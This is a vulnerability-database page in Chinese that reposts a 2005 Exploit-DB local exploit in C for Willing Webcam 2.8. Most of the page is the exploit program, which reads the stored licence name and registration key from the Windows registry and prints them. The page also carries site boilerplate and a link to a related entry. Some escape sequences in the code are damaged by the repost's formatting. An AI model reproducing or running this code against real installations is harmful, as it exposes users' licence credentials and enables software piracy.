Willing Webcam 2.8 – Licence Information Disclosure

Willing Webcam 2.8 – Licence Information Disclosure

漏洞ID 1055220 漏洞类型
发布时间 2005-07-04 更新时间 2005-07-04
图片[1]-Willing Webcam 2.8 – Licence Information Disclosure-安全小百科CVE编号 N/A
图片[2]-Willing Webcam 2.8 – Licence Information Disclosure-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1085
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*****************************************************************

Willing Webcam 2.8 licence info disclosure local exploit by Kozan

Application: Willing Webcam 2.8 (and probably prior versions)
Vendor: Willing Software - www.willingsoftware.com
Vulnerable Description: Willing Webcam 2.8 discloses licence
informations (username and key) to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: [email protected]

*****************************************************************/

#include <stdio.h>
#include <windows.h>
#define BUF 100

int main()
{

       HKEY hKey;
       char Name[BUF], Key[BUF];
       DWORD dwBUFLEN = BUF;
       LONG lRet;

       if( RegOpenKeyEx(HKEY_CURRENT_USER,
                                        "Software\Willing Software\Willing WebCam",
                                        0,
                                        KEY_QUERY_VALUE,
                                        &hKey ) == ERROR_SUCCESS )
       {
               lRet = RegQueryValueEx(hKey, "Name", NULL, NULL, (LPBYTE)Name, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Name,"Not Found!");

               lRet = RegQueryValueEx(hKey, "Key", NULL, NULL, (LPBYTE)Key, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) strcpy(Key,"Not Found!");

               RegCloseKey(hKey);

               printf("Willing Webcam 2.8 Local Exploit by Kozann");
               printf("Credits to ATmaCAn");
               printf("www.netmagister.com - www.spyinstructors.com n");
               printf("[email protected]");
               printf("Licence Name : %8sn",Name);
               printf("Licence Key  : %8sn",Key);
       }
       else
       {
               printf("Willing Webcam 2.8 is not installed on your system!n");
       }
       return 0;
}

// milw0rm.com [2005-07-04]

相关推荐: Mandrake Linux漏洞

Mandrake Linux漏洞 漏洞ID 1205079 漏洞类型 未知 发布时间 2001-11-30 更新时间 2001-11-30 CVE编号 CVE-2001-0912 CNNVD-ID CNNVD-200111-058 漏洞平台 N/A CVSS评…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享